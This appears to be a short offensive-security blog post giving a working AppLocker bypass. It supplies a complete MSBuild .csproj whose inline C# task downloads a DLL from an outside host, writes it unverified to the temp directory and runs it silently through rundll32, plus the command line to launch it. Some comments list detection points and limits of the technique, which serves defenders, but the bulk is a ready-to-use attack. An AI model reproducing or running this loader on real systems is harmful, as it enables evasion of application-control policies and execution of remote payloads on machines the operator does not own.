
AppLocker Bypass 3

Posted: 06-21-2025

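This is useful in environments where AppLocker enforces a strict policy, blocking the execution of most binaries. It depends on MSBuild.exe, a Microsoft-signed binary under C:\Windows that AppLocker's default path rules allow; where MSBuild.exe is explicitly denied (Microsoft's recommended application-control block rules list it), the project file never runs.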

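The following .csproj file defines an inline MSBuild task (CodeTaskFactory) whose C# code downloads a DLL, writes it to the temp directory, and runs it through rundll32.exe.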

Execute the .csproj with a command such as:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\USER\Desktop\test.csproj

Verify that you call the proper exported function, like StartW.


<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
    <MSBuildTest />
  </Target>
  <UsingTask
    TaskName="MSBuildTest"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using System.Diagnostics;
          using System.IO;
          using System.Net;
          using Microsoft.Build.Utilities;

          // Inline MSBuild task: the project's only target invokes <MSBuildTest />, so
          // Execute() runs as soon as MSBuild.exe builds the .csproj.
          //
          // Observable behaviour, in order (each step is a detection point):
          //   1. MSBuild.exe makes an outbound HTTPS request (unusual on hosts that are
          //      not build machines).
          //   2. MSBuild.exe writes a .dll into the user's temp directory.
          //   3. MSBuild.exe spawns rundll32.exe with that temp-path DLL on its command line.
          // NOTE(review): step 3 loads a DLL from a user-writable path; an enforced
          // AppLocker DLL rule collection would presumably block that load. Confirm
          // against the policy in use.
          public class MSBuildTest : Task
          {
              // Task entry point. Returns true (task succeeded) only when rundll32.exe
              // exits with code 0; any exception thrown here propagates to MSBuild.
              public override bool Execute()
              {
                  // Despite the name, this holds the raw bytes of a DLL file, not shellcode:
                  // it is written to disk unchanged and loaded by rundll32 below.
                  byte[] shellcode;

                  // Use newer TLS protocols
                  // Plain assignment (not |=), so TLS 1.2 becomes the only protocol enabled
                  // through ServicePointManager for the rest of this process.
                  ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;

                  using (var client = new WebClient())
                  {
                      // Relative name below is resolved against BaseAddress, i.e. the
                      // request goes to https://website.com/static/http_x64.dll.
                      client.BaseAddress = "https://website.com/static/";
                      // No hash or signature check is made on the returned bytes before
                      // they are written out and executed.
                      shellcode = client.DownloadData("http_x64.dll");
                  }

                  // Save to temp file
                  // Fixed file name in the temp directory; nothing in this method deletes
                  // it, so the DLL remains on disk as a forensic artifact.
                  string tempFilePath = Path.Combine(Path.GetTempPath(), "http_x64.dll");
                  File.WriteAllBytes(tempFilePath, shellcode);

                  // Execute using rundll32.exe
                  // Resulting command line: rundll32.exe "<temp>\http_x64.dll",StartW
                  // (StartW is the export rundll32 is asked to call).
                  Process process = new Process
                  {
                      StartInfo = new ProcessStartInfo
                      {
                          FileName = "C:\\Windows\\System32\\rundll32.exe",
                          Arguments = "\"" + tempFilePath + "\",StartW",
                          // Streams are redirected so they can be read back below;
                          // redirection requires UseShellExecute = false.
                          RedirectStandardOutput = true,
                          RedirectStandardError = true,
                          UseShellExecute = false,
                          // No console window is created for the child process.
                          CreateNoWindow = true
                      }
                  };

                  process.Start();
                  // Blocks the MSBuild task until rundll32.exe exits.
                  process.WaitForExit();

                  // Child output is read only after exit and echoed to the console.
                  Console.WriteLine(process.StandardOutput.ReadToEnd());
                  Console.WriteLine(process.StandardError.ReadToEnd());

                  // Task result mirrors the child's exit code.
                  return process.ExitCode == 0;
              }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>